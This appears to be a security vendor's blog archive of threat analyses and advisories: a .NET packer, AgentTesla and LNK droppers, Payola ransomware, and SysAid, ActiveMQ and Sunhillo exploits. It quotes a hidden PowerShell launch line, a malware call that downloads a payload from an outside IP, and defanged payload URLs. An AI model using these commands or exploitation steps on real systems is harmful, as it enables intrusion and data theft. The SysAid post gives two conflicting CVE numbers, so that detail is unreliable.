The Unseen Layers: Exploring the Tactics of Multistage .NET Malware Packers

/in /by

OVERVIEW

Recently, the SonicWall Capture Labs Threat Research team has identified a new .NET Packer that is currently being widely used by the various stealers such as Lokibot, AgentTesla etc. In the ever-evolving landscape of cybersecurity threats, malicious actors continue to develop sophisticated techniques to compromise systems and exploit vulnerabilities. One such method gaining prominence is the use of multistage .NET malware packers. These devious tools leverage the capabilities of the .NET framework to execute nefarious activities, posing a significant challenge to the cybersecurity of endpoints.
Packers employ the dynamic loading features of .NET, allowing them to download and execute additional modules or payloads off the land without ever touching the secondary storage such as Hard Disks.

To avoid detection, Packer employs evasion techniques such as polymorphic code, obfuscation and encryption. These methods make it difficult for security tools to analyze the malicious code, as it constantly changes its appearance or remains concealed within layers of encryption.

INFECTION CYCLE

Currently, Packer is mainly delivered though phishing emails with a .ZIP file as an attachment. The ZIP attachment contains the PE Packer file.

Figure 1: Infection Chain

TECHNICAL OVERVIEW

Layer 1 of Packer consists of an encrypted layer and the final payload as resource objects. Its execution begins by decrypting the next layer, which is encrypted as a resource of the Packer file named “QuanLyKhSan.GUI.ucDichVu.FR”.

Figure 2: Resource objects stored in layer 1

Figure 3: Decryption code logic for layer 2

Layer 2, which is a DLL file, consists of six exported functions.

Figure 4: Layer 2 classes along with function names

It decrypts the resource “GloriousCore.Properties.Resources.resources.HgoHWhJ”, which is an encrypted fifth layer. Meanwhile, decrypting it causes it to sleep for 15 seconds to evade detection from emulators.

UNVEILING THE FINAL PAYLOAD

1.) Loading of Ⴈ.dll

  • a. Ⴈ.dll is hardcoded in layer 2 as an encrypted byte array.
  • b. The byte array is first transformed using a simple XOR operation.

    Figure 5: XOR operation

  • c. The transformed array is then decompressed using the deflate algorithm and loaded into memory.
  • d. “Ⴈ.dll” has an encrypted resource named "Xeros.Vu.resources. Ⴐ"

2.) Decryption of resource “Xeros.Vu.resources. Ⴐ”

  • a. Layer 2 uses GZipStream to decompress the resource object “Ⴐ”.
  • b. It decrypts the decompressed buffer using an XOR loop.
  • c. The decrypted bytes are a DLL module called “ReactionDiffusion.dll”

    Figure 6: Functions names and XOR keys are stored in an encoded array.

3.) An instance of the ReactionDiffusion.dll module is created.

  • a. ReactionDiffusion.dll decrypts the method name “CausalitySource”.

    Figure 7: Invoking the function “CausalitySource”

  • b. The resource “HgoHWhJ” is a PNG file.

  • c. Packer uses steganography to hide the encrypted layer 5. It executes the function “RestoreOriginalBitmap” to convert the bitmap PNG file into an encrypted byte array.

    Figure 8: Bitmap decoding function from ReactionDiffusion.dll

  • d. An encrypted byte array is decrypted using an XOR loop with three byte keys.

    Figure 9: Decryption function for layer 5

  • e. Final output is the “Tyrone.dll” module.
    4.) Tyrone.dll has an embedded encrypted final payload. In this case, it’s LokiBot.

    Figure 10: Final payload embedded as resource

  • a. Encrypted resource “bcBuFuHG” is decrypted using a simple XOR.

Figure 11: Loading of resource using Resource Manager

Figure 12: Decryption code of the final payload

Lastly, the final payload is injected into a newly created self-process using process hollowing. The final payload in this analyzed Packer is identified as LokiBot, for which we have already written a blog post.

Evidence of the detection by SonicWall’s patented RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 13: RTDMI ATP result report conclusion

As .NET malware packers continue to evolve, so must our cybersecurity strategies. Staying informed about the latest threat vectors, adopting advanced security solutions and fostering a proactive cybersecurity posture are essential steps in mitigating the risks posed by these insidious threats. By understanding the intricacies of .NET malware packers, organizations can better protect their systems and data from the ever-present challenges of the digital landscape.

IOCs:

ZIP

  • 070b7112e24ec3a1f2d7cfab98cee1e7f3940a33b199e4ae04b367f9dd20d451

Packer

  • 301e3dd329bd0c0aa4f40a68100350867bd5c956a13f238eedbf68d58c13f2e9
  • 26c034022d9d6924477e3e79cc95590f394e3ccf2ad743163c5a80baacf2a66f
  • 4c9c03f472adf45cc9f246fdf83b28fd1e197bc2ad831dfb75371bb14d5b5585

Lokibot

  • d51297e331fce1ba9f707991445e746a5bce48b1892dfc79d107dcbff9a0b2cf

AgentTesla

  • a02e8a878b70f214f0b9cff49a7d1f594114b80dd1935f9f9e4ea19fb978ba54

SysAid Path Traversal Vulnerability

/in /by

Overview

SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, disclosed CVE-2023-47426, which is a zero-day path traversal vulnerability carrying a CVSS 9.8 score and affecting on-premise SysAid servers running version < 23.3.36. According to Microsoft’s threat intelligence team and SysAid’s Advisory, it has been exploited in the wild by Lace Tempest (DEV-0950 / TA-505). SonicWall is also currently seeing an increasing number of active exploitation attempts. This is the same threat actor responsible for exploiting the MoveIT File Transfer Tool vulnerability, and the threat actor is associated with a ransomware group known as "CL0P". To mitigate this vulnerability, SysAid has released a patch which is present in version 23.3.36.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-47246.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This path traversal vulnerability allows for threat actors to upload a malicious WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service through a POST request. The attacker can then request the web shell by browsing to the URL where it now resides to gain access to the server.

Triggering the Vulnerability

The vulnerability exists within the SysAid com.ilient.server.UserEntry class in the doPost method. The accountID parameter within this request is suspectable to the path injection since it is directly passed to the File function. By decompiling the Java code, it is possible to see the accountID parameter being saved into a string variable named convertParamater as shown in Figure 1.

Figure 1: doPost Method parsing accoutnId

convertParameter is then stored in a variable which is passed to the file constructor as shown in Figure 2. For readability, the variable has been renamed accountIDParameter.

Figure 2: accountID being used to create a file

The path dictated in the accountID parameter is the location where the data in the body of the POST request will be written. Therefore, to trigger and leverage this vulnerability the attacker needs to send a POST request to the server with the accountID parameter set to where the data in the body of the post request should be written.

Exploitation

Threat actors have been seen successfully exploiting this vulnerability by uploading a WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service. This is accomplished by sending a POST request with a zlib compressed WAR file containing the web shell as the request body and the accountID parameter are injected with the webroot directory. The threat actor then executes this web shell and gains access to the system by navigating to the location injected into the accountID parameter.

Post-Exploitation

After gaining a web shell through the SysAid vulnerability, threat actors were seen leveraging two PowerShell scripts to carry out post exploitation activities. The first is used to launch a malware loader named user.exe. This loads the GraceWire trojan and injects it into Windows processes such as spoolsv.ese. Following the first GraceWire trojan deployment, a second PowerShell script is used to erase evidence associated with the attacker’s actions including cleaning the SysAid on-prem server web logs. Figure 3 below shows the complete attack chain as presented by Zscaler.

Figure 3: Zscaler’s suspected exploit chain

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • Attempted Exploitation – IPS:4172 SysAid On-Prem Software Directory Traversal
  • Known Post Exploitation – SPY: 500 Malformed-ps1 ps1.OT_1
  • Known Post Exploitation – SPY: 501 Malformed-ps1 ps1.OT_2

Threat Graph

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graph in Figure 4 indicates an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 4: SonicWall IPS 4172 Threat Graph

Remediation Recommendations

SysAid has released an update to patch the vulnerability, and it is strongly recommended to update to version 23.3.36 if running a SysAid On-Prem server. The SysAid advisory has also published relevant IOCs and recommendations to identify any system compromise.

Relevant Links

Malicious LNK Files Use PowerShell to Deliver Payload

/in /by

Overview

This week, the Sonicwall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits – UNIQLO 2023.lnk
  • Requirements and responsibilities – UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file will run an instance of powershell.exe in the background. PowerShell is built in to Windows and is used as a scripting language that is mostly used to automate admin tasks.

The script is base64 encoded, and when decoded, it shows that its main purpose is to download additional files from a remote server.

Figure 1: Command line

The execution of this script is done without the knowledge of the user and utilizes the following options when running PowerShell.

p o w e r s h e l l . e x e - N o L o g o - N o P r o f i l e - W i n d o w S t y l e h i d d e n - E x e c u t i o n P o l i c y b y p a s s - E n c o d e d C o m m a n d

Meanwhile, an image file is launched and shows a picture of a product. In the screenshot below, an image of what seems like a Reebok-branded outfit is shown when executing the malicious LNK file named “New product Reebok 2023.lnk”.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: Powershell.exe connecting to a remote host to download a file which was saved into %temp% directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: SvczHost.exe connecting to a remote host and downloading an additional component file that was later written into %temp% directory as myRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt was created which looks like the connection log file. Interestingly the log file, contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing amount of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can contain malicious code to abuse legitimate windows system tools, which is a simple way for criminals to evade detection.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Suspicious#powershell.steal (Trojan)
• GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

SonicWall Empowers Partners with MDR and SOCaaS

/0 Comments/in , /by

The cybersecurity landscape has never been more complex. As threats grow in number and sophistication, budgets and headcount can’t keep up. In response, many IT teams have turned to managed services for their cybersecurity needs — so much so that by the end of 2023, an estimated 41% of SMB cybersecurity spend will be allocated to managed service and system integrators, up from 35% in 2020.

But these MSPs (Managed Service Providers) and MSSPs (Managed Security Service Providers) are often facing the same challenges as their clients: they lack a team of dedicated threat analysts and researchers to help manage and respond to the never-ending stream of security alerts from disparate point solutions.

To effectively bridge these gaps, SonicWall’s global network of MSPs, MSSPs and other channel partners must move from a network of unmanaged point products to a seamless platform of managed security solutions. That’s why we’re pleased to announce we’ve acquired Solutions Granted, Inc., a top MSSP based in the United States — a move that will add several key technologies to the SonicWall portfolio, including Managed Detection and Response (MDR), Security Operations Center as a Service (SOCaaS) and other managed services.

Meet Solutions Granted

Since its inception, Solutions Granted has worked with SonicWall to deliver best-in-class cybersecurity to MSPs. The company has spent the past 18 years focusing on its open ecosystem, solving alert fatigue and empowering MSPs to better secure small- and medium-sized businesses (SMBs).

Solutions Granted currently delivers world-class managed security services to MSPs throughout North America, including thousands of channel partners serving SMBs. Based on the strength of its services and support, the company has emerged as a clear leader in the security space, winning countless awards including the CRN Security 100 list (2018-2021), Top Global MSSP List (2018-2021), and Blackberry Cylance MSSP Partner of the Year (2018, 2019, 2021).

We are excited to welcome the expertise of the Solutions Granted team, particularly their CEO Michael Crean. Crean will assume a critical leadership role, advising on the ongoing process of seamlessly integrating Solutions Granted services with our products and partner offerings.

Crean is a 20-year veteran of the channel who has built a career characterized by a passion for enabling the MSP community on practical approaches to cybersecurity.

His vision of bridging the gap between information technology and security — and his commitment to providing solutions tailored to customers’ business goals, ecosystem and compliance standards — pushed Solutions Granted to quick and enduring success.

New Solutions and Services

Solutions Granted will augment partners’ managed service portfolio by extending new core offerings:

MDR for Endpoint: Comprehensive service that includes 24×7 threat monitoring, threat hunting and detection/response to all types of threats from many different points of entry

MDR for Cloud: 24×7 protection from advanced phishing and SaaS threats that make it past Microsoft 365 and Google Workspace’s defenses

SOCaaS (Managed SIEM): Centralized log management service unifying disparate security alerts and logs, designed to aid with threat investigations and compliance

Vulnerability Management: Network discovery and vulnerability management solution that identifies and prioritizes risk to your attack surface.

These services represent natural add-ons for MSPs looking to better meet customers’ evolving security and regulatory requirements. Solutions Granted services are already integrated into existing SonicWall offerings, such as firewalls and SMA (Secure Mobile Access) series, and there are other exciting developments on the horizon — including an MDR solution leveraging SonicWall Capture Client.

Benefits to You, Our Partners, MSPs and End Users

The initial acquisition of Solutions Granted was driven by an increase in partner requests for these services — and our partners will remain at the heart of SonicWall’s strategic plans going forward. Solutions Granted’s customers are many of the partners we do business with today, and this move will help them expand their business, deliver a more complete service offering, and provide advanced tools and talent as a service.

In addition to nearly half a century of combined cybersecurity expertise, SonicWall and Solutions Granted partners will benefit from a streamlined approach for managing security across customer environments, all through the same MSP-friendly unified console they’re accustomed to. And by bringing SonicWall and Solutions Granted technologies together, partners will enjoy an even greater ease of doing business.

Forging Toward the Future Together

Over time, SonicWall and Solutions Granted offerings will become as synonymous and seamless as the products contained within their portfolio. And this portfolio will continue to grow as we harness the power of superior threat intelligence to develop a unified cybersecurity platform meeting the evolving needs of service providers.

To bring this vision to life, SonicWall will leverage internal development, acquisitions and strategic partnerships to constantly innovate and deliver cutting-edge defense capabilities to keep pace with the ever-changing threat landscape.

But above all, this represents a continuation of SonicWall’s renewed commitment to its partners — one that started over a year ago with the adoption of our “outside-in” strategy and has continued with the launch of our SecureFirst Partner Program. As this journey continues, we will empower our valued partner community with cost-effective threat defense services, industry expertise and innovative technology.

Learn more about becoming a partner, or register for our live webinar hosted by Bob VanKirk and Michael Crean to get more details on this important milestone.

 

Microsoft Security Bulletin Coverage for November 2023

/in /by

Overview

Microsoft’s November 2023 Patch Tuesday has 57 vulnerabilities, and 15 of them are remote code execution vulnerabilities. The vulnerabilities can be classified into the following categories:

  • 17 Elevation of Privilege Vulnerabilities
  • 5 Security Feature Bypass Vulnerabilities
  • 15 Remote Code Execution Vulnerabilities
  • 6 Information Disclosure Vulnerabilities
  • 5 Denial of Service Vulnerabilities
  • 9 Spoofing Vulnerability

Figure 1: A pie chart breaking down the vulnerabilities by category.

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023 and has produced coverage for six of the reported vulnerabilities.

Vulnerabilities with Detections

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
ASPY 505 Exploit-exe exe.MP_351
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
ASPY 506 Exploit-exe exe.MP_352
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
ASPY 504 Exploit-exe exe.MP_350
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
ASPY 503 Exploit-exe exe.MP_349
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
ASPY 507 Malformed-docx docx.MP_10
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 502 Exploit-exe exe.MP_348

Remote Code Execution Vulnerabilities

CVE-2023-36017   Windows Scripting Engine Memory Corruption Vulnerability
CVE-2023-36028   Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
CVE-2023-36041   Microsoft Excel Remote Code Execution Vulnerability
CVE-2023-36045   Microsoft Office Graphics Remote Code Execution Vulnerability
CVE-2023-36393   Windows User Interface Application Core Remote Code Execution Vulnerability
CVE-2023-36396   Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2023-36397   Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
CVE-2023-36401   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36402   Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2023-36423   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36425   Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2023-36437   Azure DevOps Server Remote Code Execution Vulnerability
CVE-2023-36439   Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2023-38151   Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability
CVE-2023-38177   Microsoft SharePoint Server Remote Code Execution Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2023-36047   Windows Authentication Elevation of Privilege Vulnerability
CVE-2023-36049   .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
CVE-2023-36400   Windows HMAC Key Derivation Elevation of Privilege Vulnerability
CVE-2023-36403   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36405   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36407   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36408   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36422   Microsoft Windows Defender Elevation of Privilege Vulnerability
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2023-36427   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36558   ASP.NET Core – Security Feature Bypass Vulnerability
CVE-2023-36705   Windows Installer Elevation of Privilege Vulnerability
CVE-2023-36719   Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

Denial of Service Vulnerabilities

CVE-2023-36038   ASP.NET Core Denial of Service Vulnerability
CVE-2023-36042   Visual Studio Denial of Service Vulnerability
CVE-2023-36046   Windows Authentication Denial of Service Vulnerability
CVE-2023-36392   DHCP Server Service Denial of Service Vulnerability
CVE-2023-36395   Windows Deployment Services Denial of Service Vulnerability
Information Disclosure Vulnerabilities
CVE-2023-36043   Open Management Infrastructure Information Disclosure Vulnerability
CVE-2023-36052   Azure CLI REST Command Information Disclosure Vulnerability
CVE-2023-36398   Windows NTFS Information Disclosure Vulnerability
CVE-2023-36404   Windows Kernel Information Disclosure Vulnerability
CVE-2023-36406   Windows Hyper-V Information Disclosure Vulnerability
CVE-2023-36428   Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2023-36021   Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability
CVE-2023-36025   Windows SmartScreen Security Feature Bypass Vulnerability
CVE-2023-36037   Microsoft Excel Security Feature Bypass Vulnerability
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
CVE-2023-36560   ASP.NET Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2023-36007   Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability
CVE-2023-36016   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36018   Visual Studio Code Jupyter Extension Spoofing Vulnerability
CVE-2023-36030   Microsoft Dynamics 365 Sales Spoofing Vulnerability
CVE-2023-36031   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36035   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36039   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36050   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36410   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

AgentTesla Updates Its Infection Chain

/in /by

The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with AgentTesla stealer and other bots having a wide variety of capabilities.
Infection_Chain

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:
2_Powershell

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".
3_PayloadImageFig_1

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.

4_Image_Marker_tags

Figure 4: Image marker tags

After that, the PowerShell loads decoded Fiber.dll, which has the method "VAI" downloading and executing base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod(‘VAI’).Invoke($null, [object[]] (‘txt.tkjnek/25.84.011[.]97//:ptth’ , ‘dfdfd’ , ‘dfdf’ , ‘dfdf’ , ‘dadsa’ , ‘de’ , ‘cu’))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.

5_ProcessInjection_APIs

Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted on URL "hxxp://79.110.48[.]52/kenjkt.txt" has base64 encoded data. The decoded DotNet executable is the AgentTesla Payload. First, it enumerates for all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.

ChromiumBased_Browsers

Figure 6: Chromium-based browser’s data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim’s machine.
7_Mozilla_Data

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.
8_WinCredGUIDs

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.
1_WindowAPIs_Stealer

Figure 9: System information APIs

The stealer also has a list of sensitive strings or smart words, which contain a number of words leading to the private and sensitive information of an individual. In addition to this, it also checks for different email software, other common software for DB management and FTP connection and a few more well-known software.

10_TelegramBot

Figure 10: SmartWords and Telegram bot

Further, the data is exfiltrated via a telegram bot.

Evidence of detection by SonicWall’s RTDMI ™ engine can be seen below in the Capture ATP report for this file:
11_CaptureATP

Figure 11: RTDMI ATP report results

IOCs:
SHA:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

Apache ActiveMQ Remote Code Execution (CVE_2023_46604)

/in /by

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Apache ActiveMQ allowing a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. The vulnerability is categorized as an Unbounded deserialization resulting in ActiveMQ being vulnerable to a remote code execution (RCE) attack. This issue has a CVSS base score of 10.0. CVE-2023-46604 is an unauthenticated deserialization vulnerability in ActiveMQ’s OpenWire transport connector, which is enabled by default and impacts both “Classic” and Artemis clients and brokers. Vulnerable software versions include:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Organizations still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-46604.

The overall CVSS 3.1 score is 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H).

Base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is low.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Apache ActiveMQ is a widely used open-source message broker written in Java, known for its multi-protocol compatibility. It offers clients the flexibility of choosing from a variety of programming languages and platforms, with support for JavaScript, C, C++, Python, .Net and others.

An attacker connected to OpenWire TCP port 61616 can send an OpenWire packet to unmarshall an ExceptionResponse object instance. By supplying an arbitrary class name as well as an arbitrary string parameter to the BaseDataStreamMarshaller.createThrowable, the attacker will, have access to an arbitrary class to be instantiated with a single command string parameter.

Exploitation

At SonicWall Capture Labs Threat Research, we have recreated the PoC using Metasploit framework as demonstrated in Figure 1.

Before exploitation can occur, the following conditions must be true:

  • The attacker must have network access.
  • The attacker must send a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter).
  • A class must be present on the installation in the classpath which can execute arbitrary code simply by instantiating it with a String parameter.

Figure 1 below demonstrates the following steps to exploit this vulnerability:

  • Create and start a vulnerable victim server.
  • Uses a Metasploit module to host the poc.xml file on the attacker’s server.
  • Finally, run the exploit by running Exploit.java.
  • Additionally using Shodan dork we can observe over 6000 vulnerable servers exposed on the internet.

Figure 1: SonicWall Capture Labs Threat Research Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:15940 – Apache ActiveMQ OpenWire Protocol Insecure Deserialization

Threat Graphs

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graphs below indicate an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 2: Threat Graph

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

If that’s not possible, users can mitigate the issue by validating the provided throwable class type via OpenWire marshallers that takes care of OpenWire commands. Further steps to mitigate are dictated on the official link.

Relevant Links

Payola ransomware operator demands remote access to PC

/in /by

The Sonicwall threat research team have recently been tracking a new ransomware family called Payola. This family of ransomware appeared in late August 2023. It is written in .NET and is easy to analyze as it contains no obfuscation. Early variants would append ".Payola" to the names of encrypted files but the current variants use 5 random alphanumeric characters. During a direct conversation with the malware operator, remote access to our system was requested in order to retrieve files.

Infection Cycle:

The malware uses the following icon:

Upon execution, the following message is shown on the desktop background:

Files on the system are encrypted. Each encrypted file is given a 5 character alphanumeric extension appended to its name eg. image.jpg.PTebc.

The following registry entry is made:

  • HKCU\Microsoft\Windows\CurrentVersion\Run Readme {run location}

A file named README.html is dropped into directories where files where encrypted. It contains the following message:

The code is written in .NET and is trivial to decompile. We can easily see its main function and the intended program flow:

The RSA public key and salt values can be seen:

The malware contains a list of programs that will be killed if running:

A list of targeted directories and file types are listed in the code:



We followed the instructions in the ransom note and got in touch with the operator. We had the following conversation via email where the operator demanded remote access to our system using Anydesk:

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: Payola.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Sunhillo SureLine Command Injection Vulnerability

/in /by

Overview

The SonicWall Capture Labs Threat Research team has analyzed honeypot data which reveals that attackers are actively exploiting an old vulnerability found in Sunhillo SureLine devices. They are specifically taking advantage of a command injection flaw within these devices. The Sunhillo SureLine software is designed to further process surveillance data such as format conversion and data filtering as it is transported in real time.

A critical vulnerability identified as CVE-2021-36380 with a CVSS score of 9.8 was discovered in the Sunhillo SureLine software application. The vulnerability is an unauthenticated operating system (OS) command injection flaw, which could allow an attacker to execute arbitrary commands with root privileges. This could lead to a complete compromise of the target system, enabling the attacker to cause a denial of service or establish persistence on the network. To mitigate this vulnerability, it is strongly recommended that users update Sunhillo SureLine software to at least version 8.7.0.1.1 as SonicWall is seeing an increased number of exploitation in the wild.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-36380
The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

Sunhillo SureLine versions before 8.7.0.1.1 contain an unauthenticated OS command injection vulnerability through the ipAddr or dnsAddr parameters within the networkDiag.cgi script.
This script allows user-provided data to be directly inserted into a shell command via ipAddr or dnsAddr parameters. This makes it possible for an attacker to influence the command’s behavior by injecting valid OS command inputs.

Triggering the Vulnerability

To trigger the vulnerability, an attacker sends a specially crafted POST request to the webserver at the URL /cgi/networkDiag.cgi . Within this request, the attacker needs to insert a Linux command as part of the ipAddr or dnsAddr POST parameters. When the webserver processes the POST request, the command the attacker has inserted into the parameter will be executed. The lack of authentication makes it easier for an attacker to exploit this vulnerability.

Exploitation

The following POST request demonstrates how the vulnerability is being exploited in the wild:

